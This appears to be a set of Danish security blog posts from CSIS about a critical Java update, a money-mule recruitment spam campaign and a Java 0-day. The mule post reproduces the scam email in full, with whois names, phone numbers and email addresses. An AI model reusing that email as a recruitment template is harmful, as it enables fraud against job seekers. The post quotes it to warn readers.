https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play
http://www.kb.cert.org/vuls/id/922681
http://www.us-cert.gov/current/#cert_releases_upnp_security_advisory

Oracle har i nat frigivet en kritisk sikkerhedsopdatering rettet mod alle installationer af Java JRE. Opdateringen bringer Java op på version 7 Update 13.

For at opsummere skal alle installationer opgraderes herunder:

- JDK og JRE 7 Update 11 og tidligere versioner
- JDK og JRE 6 Update 38 og tidligere versioner
- JDK og JRE 5.0 Update 38 og tidligere versioner
- SDK og JRE 1.4.2_40 og tidligere versioner
- JavaFX 2.2.4 og tidligere versioner

Med denne sikkerhedsopdatering rettes flere end 50 unikke sårbarheder i Java JRE, hvoraf mindst én misbruges aktivt i drive-by og spear phishing angreb.

CSIS Heimdal lapper automatisk Java JRE
CSIS har accelereret udrulningen af denne sikkerhedsopdatering i alle installationer af Heimdal Security Agent. Alle sårbare systemer vil automatisk blive opdateret til denne version, medmindre man eksplisit har valgt ikke at opdatere Java JRE pakken. Med andre ord: hvis du har Heimdal free, pro eller corporate installeret vil du automatisk modtage denne opdatering og allerede i dag!


Vi betragter denne sikkerhedsopdatering som værende yderst kritisk og vil tilråde alle vores kunder at installere den med det samme. Vi har dokumentation for at en ny og hidtil ukendt sårbarhed i Java JRE, som ikke er identisk med den som blev hastelappet i forrige uge, misbruges i målrettede angreb.

En anden interessant observation er at installationspakken ikke længere indeholder Ask toolbar. I tidligere installationer var denne bundlet med i Java JRE pakken, men Oracle har, sandsynligvis som følge af en del kritik, valgt at ekskludere den. Det syntes vi er en fornuftig beslutning!

Yderligere oplysninger:
http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html

Almindelige brugere kan hente den relevante opdatering på adressen:
http://java.com/en/download/index.jsp

IT-kriminelle er atter på jagt efter danske muldyr som kan fungere som mellemmænd ved forskellige typer online svindel. Der er tale om den samme gruppe it-kriminelle som tidligere har udsendt talrige spambølger mod vilkårlige danske e-mail adresser.

Den uønskede e-mail ankommer med følgende indhold:

Fra: [Spoofet / forfalsket afsender adresse]

Emnelinje:

Gibraltar located enterprise presently looking for representatives from all of Europe

Indhold:

Company offering services in the e-commerce and IT fields is hiring representatives in Europe

5,000 Euro a month salary for just several hours invested each day plus a five-percent bonus

What we must have from you:
- Power of Attorney or ownership of a company or similar
- Responding to e-mail communications from us, daily
- Remain up to date with all the tasks

If this sounds right for you, please forward these following details to our company e-mail:
-  Your Name
-  Your Telephone Number in International Format
-  E-mail Address
-  Age

Please reply to: Joshua@euroconsaltinn.com

With Regards,
Division of Human Resources

-

Bemærk, at naive ofre skal lokkes til at svare tilbage til en e-mail konto hostet under domænet: euroconsaltinn.com. Det er ikke overraskende registreret igennem:

Registrar:    BIZCN.COM, INC.
Whois Server:    whois.bizcn.com

Med åbenlys forforfalskede registrantdata:

Registrant Contact:
Mamie W. Murray
Mamie Murray info@euroconsaltinn.com
920-245-0475 fax: 920-245-0411
3390 Rockford Mountain Lane
West Allis WI 53227
us

Domænet anvender to navneservere:

ns1.stageportal.net
ns2.stageportal.net

Navneserveren er registreret af:

LAUREEN FREEMAN
7538 TRADE ST.
SAN DIEGO, CA 92121
US
Phone: +1.8585668488
Email: wondermitch@hotmail.com

- hvor e-mail adressen "wondermitch@hotmail.com" ikke overraskende kan knyttes til talrige spamkampagner hvor payloaden er Citadel. Et eksempel er dækket af Dancho Danchev i Webroot bloggen knyttet til spamkampagnen "Your Kindle e-book Amazon receipt":
http://blog.webroot.com/2013/02/05/your-kindle-e-book-amazon-receipt-themed-emails-lead-to-black-hole-exploit-kit/

CSIS Security Group bliver ved med at finde sårbarheder i de computerprogrammer, som de fleste danskere bruger til daglig. Her til morgen har vi netop overvåget en 0-dags sårbarhed i Java, der aktivt misbruges af hackere. Og netop dette emne om hacking-angreb i Danmark, kan du høre meget mere om i medierne i dag.

Vores it-ekspert Jan Kaastrup er bl.a. ude at fortælle om situationen i Danmark og hvad, man kan gøre for at beskytte sig. Hacking er nemlig ikke længere noget, som kun store virksomheder udsættes for. I dag kan også privatpersoner udsættes for angreb, som du kan se eksempler på i artiklen her. CSIS vurderer, at der har været mere end 80.000 angreb bare sidste år – og ofte er det helt normale internet-brugere, der udsættes for misbrug eller identitetstyveri.

For at undgå sådanne angreb kan det være fordelagtigt at holde sine computerprogrammer opdaterede. Men synes du også, at det kan være lidt en jungle at finde rundt i, så kan du i stedet vælge at lade programmer som fx Heimdalgøre det for dig helt automatisk.

Ønsker du at følge sagen nærmere, kan du fx se morgenens nyhedsindslag hereller Jan i 19:00-nyhederne på TV2 i aften.